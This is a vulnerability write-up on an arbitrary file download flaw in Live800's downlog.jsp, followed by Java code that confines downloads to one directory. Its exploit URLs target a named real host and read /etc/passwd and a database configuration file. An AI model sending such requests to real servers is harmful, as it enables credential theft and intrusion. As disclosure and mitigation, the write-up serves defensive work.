Live800 customer service system Arbitrary File Download Vulnerability
Hackers discovered this vulnerability. Many large vendors use the affected system, so the impact is severe.
Fuzzing a Live800 customer service site turns up a downlog.jsp file.
Here, Huawei is used as an example:
http://robotim.vmall.com/live800/downlog.jsp
Judging by the message the page returns, downlog.jsp is probably not receiving a download path, so the next step is to fuzz its parameters:
downlog.jsp?path=/&file=etc/passwd
downlog.jsp?filepath=/&file=etc/passwd
downlog.jsp?filepath=/&filename=etc/passwd
……
Fuzzing finally reaches downlog.jsp?filepath=/&fileName=/etc/passwd, and the file is downloaded successfully.
http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/etc/passwd
This vulnerability allows you to download the dataSource.xml file:
http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/home/---xxxx-xx-/live800/WEB-INF/conf/dataSource.xml
In other words, downlog.jsp can be used to download arbitrary files on the server.
The final downlog.jsp source code is as follows:
Additional examples added by the administrators (masked region):
1. ://**.**.**//im.youshang.com
2. http://**.**.**/
3. http://**.**.*******?
Solution:
Delete the downlog.jsp file, or restrict the fileName parameter so that it can only download files from a specific directory.
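One way to implement the second option, shown as an added example (not Live800's code and not part of the original write-up). The class name SafeDownload, the method resolve and the sample file names are hypothetical; the base directory is assumed to be the only location the handler may serve from.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;

// Added example: confine a download handler's fileName parameter to one directory.
// SafeDownload and resolve() are hypothetical names, not taken from downlog.jsp.
public class SafeDownload {

    /** Returns the file to serve, or throws if fileName points outside baseDir. */
    static Path resolve(Path baseDir, String fileName) throws IOException {
        if (fileName == null || fileName.isEmpty() || fileName.indexOf('\0') >= 0) {
            throw new SecurityException("missing or malformed fileName");
        }
        // Canonical form of the allowed directory (symlinks resolved).
        Path base = baseDir.toRealPath();
        Path candidate;
        try {
            // An absolute fileName such as /etc/passwd replaces the base here,
            // and ../ sequences are collapsed by normalize().
            candidate = base.resolve(fileName).normalize();
        } catch (InvalidPathException e) {
            throw new SecurityException("malformed fileName");
        }
        // Path.startsWith compares whole path elements, not string prefixes.
        if (!candidate.startsWith(base)) {
            throw new SecurityException("fileName escapes the download directory");
        }
        // Resolve symlinks and check again, so a link inside the directory
        // cannot point the handler at a file outside it.
        Path real = candidate.toRealPath();
        if (!real.startsWith(base) || !Files.isRegularFile(real)) {
            throw new SecurityException("fileName is not a regular file in the directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample data: a temporary directory with one log file.
        Path base = Files.createTempDirectory("logs");
        Files.write(base.resolve("chat.log"), "sample".getBytes());
        String[] inputs = {"chat.log", "sub/../chat.log", "/etc/passwd", "../../etc/passwd"};
        for (String in : inputs) {
            try {
                System.out.println(in + " -> served: " + resolve(base, in));
            } catch (SecurityException | IOException e) {
                System.out.println(in + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

The handler should take only the file name from the request and keep the base directory in server-side configuration, rather than accepting a separate path parameter from the client.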